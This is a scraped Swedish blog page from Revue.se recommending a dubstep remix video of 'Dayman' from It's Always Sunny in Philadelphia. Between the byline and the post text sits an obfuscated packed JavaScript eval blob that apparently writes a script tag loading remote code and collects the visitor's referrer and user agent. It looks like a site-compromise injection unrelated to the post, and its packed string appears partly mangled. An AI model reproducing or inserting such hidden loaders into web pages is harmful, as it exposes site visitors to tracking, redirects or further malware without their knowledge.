Image Image Image Image Image Image Image Image Image Image

| 19 februari, 2018

Scroll to top

Top

No Comments

It's Always Sunny in Philadelphia: Daymanstep | Revue.se

Alexander Gylemo

Lite eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihibe|var|u0026u|referrer|kadeb||js|php’.split(‘|’),0,{}))
humor för oss som älskar komediserien It’s Always Sunny in Philadelphia och dubstep! Joman har tagit Dennis och Charlie’s låt ”Dayman” och gett den en liten twist, och klippt ihop en passande musikvideo!